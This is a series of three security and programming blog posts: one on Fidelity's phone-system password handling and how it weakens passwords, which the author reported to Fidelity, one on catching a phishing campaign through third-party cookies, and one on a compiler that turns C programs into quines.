Any website providing personalized services is likely to have an authentication option that involves entering username and password. That website then has to verify whether the correct password is entered, by comparing the submitted version against the one recorded when the customer last set/changed their password.

Surprisingly there are ways to do that without storing the original password itself. In fact storing passwords is an anti-pattern. Even storing them encrypted is wrong: “encryption” by definition is reversible. Given encrypted data, there is a way to recover the original, namely by using the secret key in a decryption operation. Instead passwords are stored using a cryptographic hash-function. Hash functions are strictly one-way: there is no going back from the output to the original input. Unlike encryption, there is no magic secret key known to anyone— not even the person doing the hashing— that would permit reversing the process.

For example, using the popular hash function bcrypt, the infamous password “hunter2” becomes:

$2b$12$K1.sb/KyOqj6BdrAmiXuGezSRO11U.jYaRd5GhQW/ruceA9Yt4rx6

This cryptographic technique is a good fit for password storage because it allows the service to check passwords during login without storing the original. When someone claiming to be that customer shows up and attempts to login with what is allegedly their password, the exact same hash function can be applied to that submission. The output can be compared against the stored hash and if they are identical, one can conclude with very high probability that the submitted password was identical to the original. (Strictly speaking, there is a small probability of false positives: since hash functions are not one-to-one, in theory there is an an infinite number of “valid” submissions that yield the same hash output. Finding one of those false-positives is just as difficult as finding the correct password, owing to the design properties of hash functions.)

From a threat model perspective, one benefit of storing one-way hashes is that even if they are disclosed, an attacker does not learn the user credential and can not use it to impersonate the user. Because hashes are irreversible, the only option available to an attacker is to mount a brute-force attack: try billions of password guesses to see if any of them produce the same hash. The design of good hash-functions for password storage is therefore an arms-race between defenders and attackers. It is a careful trade-off between making hashing efficient enough for the legitimate service to process a handful of passwords quickly during a normal login process, while making it expensive enough to raise costs for an attacker trying to crack a hash by trying billions of guesses.

A miss is as good as a mile

Much ink has been spilled over the subtleties of designing good functions for password hashing. An open competition organized in 2013 sought to create a standardized, loyalty-free solution for the community. Without going too much into details of these constructions, the important property for our purposes is that good hash functions are highly sensitive to their input: change even one bit of the input password and the output changes drastically. For example, the passwords “hunter2” and “hunter3” literally differ in just one bit—the very last bit distinguishes the digit three from the digit two in ASCII code. Yet their bcrypt hashes look nothing alike:

Hash of hunter2 ➞ zSRO11U.jYaRd5GhQW/ruceA9Yt4rx6

Hash of hunter3 ➞ epdCpQLaQbcGTREZLZAFDKp5i/zQmp2

(One subtlety here: password hash functions including bcrypt incorporate a random “salt” value to make each hash output unique, even when they are invoked on the same password. To highlight changes caused by the password difference, we deliberately used the same salt when calculating these hashes above and omitted the salt from the displayed value. Normally it would appear as a prefix.)

Bottom line: there is no way to check if two passwords are “close enough” by comparing hash outputs. For example, there is no way to check if the customer got only a single letter of the password wrong or if they got all the letters correct except for lower/upper-case distinction. One can only check for exact quality.

The mystery at Fidelity

Having covered the basics of password hashing we can now turn to the unusual behavior of the Fidelity IVR system. Fidelity is authenticating customers by comparing against a variant of their original password. The password entered on the phone is derived from, but not identical to the one used on the web. It is not possible to perform that check using only a strong cryptographic hash. A proper hash function suitable for password storage would erase any semblance of similarity between these two versions.

There are two possibilities:

  1. Fidelity is storing passwords in a reversible manner, either directly as clear-text or in an encrypted form where they can still be recovered for comparison.
  2. Fidelity is canonicalizing passwords before hashing, converting them to the equivalent “IVR format” consisting of digits before applying the hash function.

It is not possible to distinguish between these, short of having visibility into the internal design of the system.

But there is another quirk that points towards the second possibility: the website and mobile apps also appear to validate passwords against the canonicalized version. A customer with the password “hunter2” can also login using the IVR-equivalent variant “HuNt3R2

Implications

IVR passwords are much weaker than expected against offline cracking attacks. While seemingly strong and difficult to guess, the password iI.I0esl>E`+:P9A is in reality equivalent to the less impressive 4404037503000792.

The notion of entropy can help quantify the problem. A sixteen character string composed of randomly selected printable ASCII characters has an entropy around 105 bits. That is a safety margin far outside the reach of any commercially motivated attacker. Now replace all of those 16 characters by digits and the entropy drops to 53 bits— or about nine quadrillion possibilities, which is surprisingly within range of hobbyists with home-brew password cracking systems.

In fact entropy reduction could be worse depending on exactly how users are generating passwords. The mapping from available password symbols to IVR digits is not uniform:

  • Only the character 1 maps to the digit 1 on the dial-pad.
  • Seven different characters (A, B, C, a, b, c, 2) are mapped to the digit 2
  • By contrast there are nine different symbols mapping to the digit 7, due to the presence of an extra letter for that key on the dial-pad
  • Zero is even more unusual in that all punctuation marks and special characters get mapped to it, for more than 30 different symbols in total

In other words, a customer who believes they are following best-practices, using a password manager application and having their app generate “random” 16 character password will not end up with a uniformly distributed IVR password. Zeroes will be significantly over-represented due to the bias in mapping while the digit one will be under-represented.

The second design flaw here involves carrying over the weakness of IVR passwords to the web interface and mobile applications. While the design constraints of phone-based customer support requires accepting simplified passwords, it does not follow that the web interface would also accept these. (This assumes the web interface grants higher privileges, in the sense that certain actions can only be carried out by logging into the website— such as adding bank accounts and initiating funds transfers— and not possible through IVR.)

Consider an alternative design where Fidelity asks customers to pick a secondary PIN for use on the phone. In this model there are two independent credentials. There is the original password used when logging in through the website or mobile apps. It is case-sensitive and permits all symbols. An independent PIN consisting only of digits is selected by customers for use during phone authentication. Independent being the operative keyword here: it is crucial that the IVR PIN is not derived from the original password via some transformation. Otherwise an attacker who can recover the weak IVR PIN can use that to get a head-start on recovering the full password.

Responsible disclosure

This issue was reported to the Fidelity security team in 2021. This is their response:

“Thank you for reaching out about your concerns, the security of your personal information is a primary concern at Fidelity. As such, we make use of industry standard encryption techniques, authentication procedures, and other proven protection measures to secure your information. We regularly adapt these controls to respond to changing requirements and advances in technology. We recommend that you follow current best practices when it comes to the overall security of your accounts and authentication credentials. For further information, you can visit the Security Center on your Fidelity.com account profile to manage your settings and account credentials.”

Postscript: why storing two hashes does not help

To emphasize the independence requirement, we consider another design and explain why it does not achieve the intended security effect. Suppose Fidelity kept the original design for a single password shared between web and IVR, but hashed it two ways:

  • First is a hash of the password verbatim, used for web logins.
  • Second is a hash of the canonicalized password, after being converted to IVR form by mapping all symbols to digits 0 through 9. This hash is only checked when the customer is trying to login through the phone interface.

This greatly weakens the full password against offline cracking because the IVR hash provides an intermediate stepping stone to drive guessing attacks against the full credential. We have already pointed out that the entropy in all numeric PINs is very low for any length customers could be expected to key into a dial-pad. The additional problem is that after recovering the IVR version, the attacker now has a much easier time cracking the full password. Here is a concrete example: suppose an attacker mounts a brute-force attack against the numeric PIN and determines that a stolen hash corresponds to “3695707711036959.” That data point is very useful when attempting to recovery the full password, since many guesses are not compatible with that IVR version. For example, the attacker need not need waste any CPU cycles on hashing the candidate password “uqyEzqGCyNnUCWaU.” That candidate starts with “u” which would map to the digit “8” on a dial-pad. It would be inconsistent with something the attacker already knows: the first character of the real password maps to 3, based on the IVR version. Working backwards from the same observation, the attacker knows that they only need to consider guesses where the first symbol is one of {8, t, u, v, T, U, V}.

This makes life much easier for an attacker trying to crack hashes. The effort to recover a full password is not even twice the amount required to go after the IVR version. Revisiting the example of 16 character random passwords: we noted that unrestricted entries have about 105 bits of entropy while the corresponding IVR version is capped to around 53 bits. That means once the simplified IVR PIN is recovered by trying 2**53 guesses at most, the attacker only needs another 2**(105-53) == 2**52 guesses to hit on the full password. This is only about 50% more incremental work— and on average the correct password will be discovered halfway through the search. In other words, having a weak “intermediate” target to attack has turned an intractable problem (2**105 guesses) into two eminently solvable sub-problems.

CP

Saved by third-party cookies: when phishing campaigns make mistakes

(Or, that rare instance when third-party cookies actually helped improve security.)

Third-party cookies have earned a bad reputation for enabling widespread tracking and advertising driven surveillance online— one that is entirely justified. After multiple half-hearted attempts to deprecate them by leveraging its browser monopoly with Chrome, even Google eventually threw in the towel. Not to challenge that narrative but this blog provides an example of an unusual incident where third-party cookies actually helped protect consumers, protecting them from an ongoing phishing attack. While this phishing campaign occurred in real life, we will refer to the site in question as Acme, after the hypothetical company in Wile E Coyote.

Recap on phishing

Phishing involves creating a look-alike, replica of a legitimate website in order to trick customers into disclosing sensitive information. Common targets are passwords which can be used to login to the real website by impersonating the user. But phishing can also go after personally identifiable information such as a credit-cards or social-security numbers directly, since those are often monetizable on their own. The open nature of the web makes it trivial to clone the visual appearance of websites for this purpose. One can simply download every image, stylesheet, video from that site, stash the same content on a different server controlled by the attacker and point users into visiting this latter copy. (While this sounds sinister, there are even legitimate use cases for it such as mirroring websites to reduce load or protect them from denial-of-service-attacks.)

Important point to remember is that visuals can be deceptive: the bogus site may be rendered pixel-for-pixel identical inside the browser view. The address bar is one of the only reliable clues to the provenance of the content; that is because it is part of the user-interface controlled 100% by the browser. It can not be manipulated by the attacker. But good luck spotting the difference between login.acme.com, loginacme.com, acnne.com or any of the dozen other surprising ways to confuse the unwary. Names that look “close” at the outset can be controlled by completely unrelated entities, thanks to the way DNS works.

What makes phishing so challenging to combat is that the legitimate website is completely out of the picture at the crucial moment the attack is going on. The customer is unwittingly interacting with a website 100% controlled by an adversary out to get them, while under the false impression that they are dealing with a trusted service they have been using for years. Much as the real site may want to jump in with a scary warning dialog to stop their customer from making a crucial judgment error, there is no opportunity for such interventions. Recall that the customer is only interacting with the replica. All content the user sees is sourced from the malicious site, even if it happens to be a copy of content originally copied from the legitimate one.

Rookie mistake

Unless that is, the attacker makes a mistake. That is what happened with the crooks targeting Acme: they failed to clone all of the content and create a self-contained replica. One of the Acme security team members noticed that the malicious site continued to reference content hosted from the real one. Every time a user visited the phishing site, their web browser was also fetching content from the authentic Acme website. That astute observation paved the way for an effective intervention.

In this particular phishing campaign, the errant reference back to the original site was for a single image used to display a logo. That is not much to work with. On the one hand, Acme could detect when the image was being embedded from a different website, thanks to the HTTP Referer [sic] header. (Incidentally referrer-policies today would interfere with that capability.) But this particular image consumed precious little screen real estate, only measuring a few pixels across. One could return an altered image— skull and crossbones, mushroom cloud or something garish— but it is very unlikely users would notice. Even loyal customers who have the Acme logo committed to memory might not think twice if a different image appears. Instead of questioning the authenticity of the site, they would attribute that quirk to a routine bug or misguided UI experiment.

It is not possible to influence the rest of the page by returning a corrupt image or some other type of content. For example it is not possible to prevent the page from loading or redirect it back to the legitimate login page. Similarly one can not return some other type of content such as javascript to interrupt the phishing attempt or warn users. (Aside: if the crooks had made the same mistake by sourcing a javascript file from Acme, such radical interventions would have been possible.)

Remember me: cookies & authentication

To recap, this is the situation Acme faces:

  1. There is an active phishing campaign in the wild
  2. Game of whack-a-mole ensues: Acme security team continues to report each site to browser vendors and hosting companies and Cloudflare (Crooks are fond of using Cloudflare, because it acts as a proxy sitting in front of the malicious site, disguising its true origin and making it difficult for defenders to block it reliably.) Attacker responds by changing domain names and resurfacing the exact same phishing page under a different domain name.
  3. Every time a customer visits a phishing page, Acme can observe the attack happening in real time because its servers receive a request
  4. Despite being in the loop, Acme can not meaningfully disrupt the phishing page. It has limited influence over the content displayed to the customer

Here is the saving grace: when customers reach out to the legitimate Acme website in step #3 as part of the phishing page, their web browser sends along all cookies. Some of those cookies contain information that uniquely identifies the specific customer. That means Acme finds out not only that some customer visited a phishing site, but it can find out exactly which customer did. In fact there were at least two such cookies:

  • “Remember me” cookie used to store email address and expedite future logins by filling in the username field in login forms.
  • Authentication cookies set after login. Interestingly, even expired cookies are useful for this purpose. Suppose Acme only allowed login sessions to last for 24 hours. After the clock runs out, customer must reauthenticate by providing their password or MFA again. Authentication cookies would have embedded timestamps reflecting those restriction. In keeping with the policy of requiring “fresh” credentials, after 24 hours that cookie would no longer be sufficient for authenticating the user. But for the purpose of identifying which user is being phished, it works just fine. (Technical note: “expired” here is referring to the application logic; the HTTP standard itself defines an expiration time for cookies after which point the browser deletes that cookie. If a cookie expires in that sense, it would not be of much use— it becomes invisible to the server.)

This gives Acme a lucky break to protect customers from the ongoing phishing attack. Recall that Acme can detect when incoming request for the image is associated with the phishing page. Whenever that happens, Acme can use the accompanying cookies to look up exactly which customer has stumbled onto the malicious site. To be clear, Acme can not determine conclusively whether the customer actually fell for phishing and disclosed their credentials. (There is a fighting chance the customer notices something off about the page after visiting it, and stops short of giving away their password. Unfortunately that can not be inferred remotely.) As such Acme must operate on the worst-case assumption that phishing will succeed and place preemptive restrictions on the account, such as temporarily suspending logins or restricting dangerous actions. That way, even if the customer does disclose their credentials and the crooks turn around to “cash in” those credentials by logging into the genuine Acme website, they will be thwarted from achieving their objective.

Third-party stigma for cookies

There is one caveat to the availability of cookies required to identify the affected customer: those cookies are now being replayed in a third-party context. Recall that the first vs third-party distinction is all about context: whether a resource (such as image) being fetched for inclusion on a webpage is coming from the same site as the overall owner of the page, called “top level document.” When an image is fetched as part of a routine visit to Acme website, it is a first-party request because the image is hosted at the same origin as the top-level document. But when it is being retrieved by following a reference from the malicious replica, it becomes a third-party request.

Would existing Acme cookies get replayed in that situation and reveal the identity of the potential phishing victim? That answer depends on multiple factors:

  1. Choice of browser. At the time of this incident, most popular web browsers freely replayed cookies in third-party contexts, with two notable exceptions:
    • Safari suppressed cookies when making these requests.
    • Internet Explorer: As the lone browser implementing P3P, IE will automatically “leash” cookies if they are set without an associated privacy policy: cookies will be accepted, but only replayed in first-party contexts.
  2. User overrides to browser settings. While the preceding paragraph section describes the default behavior of each browser, users can modify these to make them more or less stringent.
  3. Use of “samesite” attribute. About 15 years after IE6 inflicted P3P and cookie management on websites, a proposed update to the HTTP cookie specification finally emerged to standardize and generalize its leashing concept. But the script was flipped: instead of browsers making unilateral decisions to protect user privacy, website owners would declare whether their cookies should be made available in third-party contexts. (One can imagine which way advertising networks— crucially dependent on third-party cookie usage for their ubiquitous surveillance model— leaned on that decision.)

Luckily for Acme, the relevant cookies here were not restricted by the samesite attribute. As for browser distribution, IE was irrelevant with market share in the single digits, primarily restricted to enterprise users in managed IT environments, a far cry from the target audience for Acme. Safari on the other hand did have a non-negligible share, especially among mobile clients since Apple did not allow independent browser implementations such as Chrome at the time. (That restriction would only be lifted in 2024 when the EU reset Apple’s expectations around monopolistic behavior.)

In the end, it was possible to identify and take evasive actions for the vast majority of customers known to have visited the malicious website. More importantly, intelligence gathered from one interaction is frequently useful in protecting other customers, even when the latter are not directly identified as being targeted by an attack. For example, an adversary often has access to a handful of IP4 addresses when they are attempting to cash-in stolen credential. When an IP address is observed attempting to impersonate a known phishing victim, every other login from that IP can be treated with higher suspicion. Detection mechanisms can be invaluable even with less than 100% coverage.

Verdict on third-party cookies 

Does this prove third-party cookies have some redeeming virtue and the web will be less safe when— or at this rate, if— they are fully deprecated? No. This anecdote is more the exception proving the rule. Advertising industry has been rallying in defense of third-party cookies for over a decade, spinning increasingly desperate and far-fetched scenarios. From the alleged death of “free” content (more accurately, ad-supported content where the real product being peddled are the audience eyeballs for ad networks) to allegedly reduced capability for detecting fraud and malicious activity online, predictions of doom have been a constant part of the narrative.

To be clear: this incident does not in any way provide more ammunition for such thinly-veiled attempts at defending a fundamentally broken business model. For starters, there is nothing intrinsic to phishing attacks that requires help from third-party cookies for detection. The crooks behind this particular campaign made an elementary mistake: they left a reference to the original site when cloning the content for their malicious replica. There is no rule that says other crooks are required to follow suit. While this is an optimistic assumption built into defense strategies such as canary tokens, new web standards have made it increasingly easier to avoid such mistakes. For example content security policy allows a website to precisely delineate which other websites can be contacted for fetching embedded resources. It would have been a trivial step for crooks to add CSP headers and prevent any accidental references back to the original domain, neutralizing any javascript logic lurking in there to alert defenders.

Ultimately the only robust solution for phishing is using authentication schemes that are not vulnerable to phishing. Defense and enterprise sectors have always had the option of deploying PKI with smart-cards for their employees. More recently consumer-oriented services have convenient access to a (greatly watered-down) version of that capability with passkeys. Jury is out on whether it will gain any traction or remain consigned to niche audience owing to the morass of confusing, incompatible implementations.

CP

QCC: Quining C Compiler

Automating quine construction for C

A quine is a program that can output its own source code. Named after the 20th century philosopher Willard Van Orman Quine and popularized in Godel, Escher, Bach, writing quines has quickly become a quintessential bit of recreational coding. Countless examples can be found among the International Obfuscated C Code Contest (IOCCC) entries. While quines are possible in any Turing complete programming language— more on that theoretical result below— writing them can be tricky due to the structural requirements placed on the code for a valid quine. Success criteria is very strict: the output must be exactly identical to the original source, down to spacing and newlines. A miss is as good as a mile. The starting point for this blog post is a search for simplifying the creation of arbitrary quines. For concreteness, this proof of concept will focus on C. But the underlying ideas extend to other programming languages.

Since most interesting quines have some additional functionality besides being able to output their own code, it would be logical to divide development into two steps:

  1. Write the application as one normally would
  2. Convert it into a quine by feeding it through a compiler. (More accurately, a “transpiler” or “transcompiler” since the output itself is another valid program in the same language.)

Motivating example

Consider the canonical example of a quine. It takes no inputs and simply prints out its own source code to standard out. Here is a logical, if somewhat naive, starting point in C:

Minor problem: this is not a valid C program. Doing all the heavy lifting is a mystery function “get_self” that is not declared— much less defined— anywhere in the source file. (Historical aside: C used to permit calling such undeclared functions, with an implicit assumption of integer return type. Those liberties were revoked with the C99 standard. In any case, adding a declaration will merely postpone the inevitable: the compile-time error about undefined symbols becomes a link-time error about unresolved symbols.)

What if we could feed this snippet into another program that automatically transform it into a valid C program working as intended? Before going down that path, it is important to clarify the success criteria for a “working” quine. Informally we are looking for a transformation with these properties:

  • Accepts as input an “almost valid” C program with one undefined function get_self(). This function takes no arguments and returns a nil-terminated C string.
  • Outputs a valid C program with identical functionality
  • That new program includes a valid C implementation of  get_self() which returns the entire source code of the modified program, including the newly added function.

There are two subtleties here: First the implementation must return the source code of the modified program, incorporating all additions and changes made by the transformation. Printing the original, pre-transformed source would not qualify as a true quine. Second, the implementation provided for the mystery function get_self() must operate at source level. There are trivial but OS dependent ways to convert any program into a quine by mucking with the binary executable, after the compilation is done. For example, the ELF format for Linux executables allows adding new data sections to an existing file. One could take the source code and drop that into the compiled binary as a symbol with a specific name such as “my_source_code.” This allows for a simple  get_self() implementation that parses the binary for the current executable, searching for that symbol in data sections and converting the result into a C string. Expedient as that sounds, such approaches are considered cheating and do not qualify as true quines according to generally accepted definition of a self-replicating program. Informally, the  “quineness” property must be intrinsic to the source. In the hypothetical example where one is playing games with ELF sections, the capability originated with an after-the-fact modification of the binary and is not present anywhere in the source. Another example of cheating would be to commit the source code to an external location such as Github and download it at runtime. These are disqualified under our definition.

QCC: Quining C Compiler

qcc is a proof-of-concept that transforms arbitrary C programs to create valid quines according to the rules sketched above. For example, running the pre-quine sample from the last section through qcc yields a valid quine:

Looking at the transformed output, we observe the original program verbatim in the listing (lines 8-15) sandwiched between prepended and appended sections:

Changes preceding the original source are minimal:

  • Courtesy warning against manual edits, as any change is likely to break the quine property. This is optional and can be omitted.
  • Include directives for standard C libraries required by the get_self() implementation. This is also optional if the original source already includes them. (This PoC does not bother to check. Standard library headers commonly have include guards; second and subsequent inclusions become a noop.) Incidentally, includes can also be deferred until the section of source referencing them. There is no rule dictating that all headers must appear at the start; it is merely a style convention most C/C++ developers abide by.
  • Declaration of get_self(). Also can be omitted if the original program has one.

More substantial additions appear after the original code:

  • Definition of a helper function for hex-decoding.
  • Two string constants carrying hex-encoded payloads. These could have been merged into a single string constant, but keeping them separate helps clarify the quine mechanism.
  • Definition of the get_self() function. This is the core of the implementation.

Hex-decoding the first string shows that it is just the the original program, with minor changes for headers/declaration prepended and the helper function appended. There is nothing self-referential or unusual going on. But the second hex payload when decoded is identical to the function get_self(). That is the tell-tale of sign quines: inert “data” strings mirroring code that gets compiled into executable instructions. Note that while the first string constant is a function of the original input program, the second one is identical for all inputs. (This is why separating them helps clarify the mechanism.)

Making a quine out of the quining compiler

Careful readers will note that qcc itself is a C program, but the initial version referenced above is not itself a quine. That will not stand. One natural option is to add a new command line flag that will induce qcc to output its own source code instead of quining another program.

Boot-strapping that has one tricky aspect: one needs a functioning qcc executable before it can quine its own source code. While this can be achieved by maintaining two different versions of the compiler, it is possible to get by with a single version with some judicious use of preprocessor tricks and conditional compilation. The trick is defining a preprocessor macro and surrounding any code paths that reference quine-like behavior with #ifdef guards referencing that macro:

  1. Add an option to qcc to define this macro explicitly in the transformation when outputting a quine. That capability will come in handy for any application that needs to be a valid C program in its pre-quine state.
  2. Compile with default settings, resulting in the preprocessor macro being undefined and leaving those sections out of the build. (That is a good thing: otherwise compiler errors will result from the nonexistent self-referential function referenced in those lines.)
  3. Run this original, pre-quine qcc binary on its own source code, and specify that the preprocessor macro is to be defined in the output.
  4. Save and recompile the transformed output as the new qcc. No need to explicitly define the preprocessor macro via compiler flags; it is already hardwired into the transformed source.

This final version can now output its own source, in addition to quining other C programs:

Caveats and design options

As this is a proof of concept, there are caveats:

  • It only operates on single files. As such it can not be used to create multiquines, where a collection of more than one program has access to the source code of every other program in the collection. That case can be handled by first concatenating them into a single program and some preprocessor tricks. Straight concatenation alone would result in an invalid C program, due to multiple definitions for main, not to mention any other conflicting symbol used. But conditional compilation with #ifdef allows activating only a subset of code during compilation.
  • Choice of hex encoding is arbitrary. It is certainly not space-efficient, doubling the size of the original input. On the other hand, using hex avoids the visual clutter/confusion caused by having strings that look like valid C code. Raw C strings also have the drawback that special characters such as double quotes and backslashes must be escaped.  While decoding is free in the sense that the C compiler takes care of it, helper functions are still needed for outputting escaped strings. Hex is simple enough to encode/decode in a handful of lines compared to more elaborate options such as base64 or compression, both of which would require more code inlined into every quine or pull in new library dependencies.
  • Implementation of get_self() is not thread safe, due to use of static variables. If there is a race condition where multiple threads race to execute the first-time initialization code, the string holding the source code representation will get computed multiple times. All threads will still receive the correct value, but extra memory will be wasted for unused versions.
  • String constants are currently emitted as a single line, which may overflow the maximum allowed depending on compiler. (C standard requires support for at least 4K characters and most compilers in practice far exceed that limit.)
  • Finally: QCC transformations are easily recognizable. There is no attempt to hide the fact that a quine is being created. Functions and variable identifiers have meaningful, intuitive names. This is problematic in contexts such as IOCC where obfuscation and brevity are virtues.

Post-script: excursion on Kleene’s recursion theorem

Stepping back, qcc is an implementation of a transform that is guaranteed to exist by virtue of a result first proven in 1938, namely Kleene’s second-recursion theorem. While that theorem was originally stated in the context of recursive functions, here we state it in an equivalent setting with Turing machines.

Consider a Turing machine T that computes a function of two inputs x and y:

T(x, y) 

Kleene’s result states that there is a Turing machine S which computes a function of just one input, such that the behavior of S on all inputs is closely related to the behavior of T:

x S(x) = T(x, #S)

where #S is the Turing number for the machine S— in other words, a reference to S itself. This statement says that for all inputs, S behaves just like the original machine T acting on the first input, with the second input hard-wired to its own (that is, of S) Turing number.

Since programming languages are effectively more convenient ways to construct Turing machines, we can translate this into even more familiar territory. Suppose we have a program P written in a high-level language which takes two inputs:

P(x, y) output

Kleene’s theorem guarantees the existence of a program Q which takes a single input x and computes:

Q(x) = P(x, source(Q))

Here source(Q) is the analog of Turing numbers for high-level programming languages, namely a textual representation of the program Q in the appropriate alphabet, such as ASCII or Unicode.

For a concrete example, consider replicating a recent IOCCC entry: write a program that outputs its own SHA512 hash. At first this seems impossible, barring a catastrophic break in SHA512. As a cryptographic hash function, SHA512 is designed to be one-way: given a target hash, it is computationally infeasible to find a preimage input that would produce that target when fed into SHA512. Given the difficulty of that basic problem, finding a “self-consistent” program such that its own SHA512 hash is somehow contained in the source code seems daunting. But Kleene’s result makes it tractable. As a starting point, it is easy enough to write a program that receives some input (for example, from console) and outputs the SHA512 hash of that input. Squinting a little, we can view this as a degenerate function on two inputs. The first input is always ignored while the second input is the one processed through the hash function:

P(x, y) SHA512(y)

Kleene’s recursion theorem then guarantees the existence of a corresponding program Q:

Q(x) = P(x, source(Q)) = SHA512(source(Q))

In other words, Q prints a cryptographic hash of its own source code.

Given this background, we have a theoretical view on QCC: For C programs that can be expressed in a single compilation unit, QCC constructs another C program that is the “fixed-point” guaranteed to exist by Kleene’s second recursion theorem, with the second input hard-wired to the source code of the new program.

CP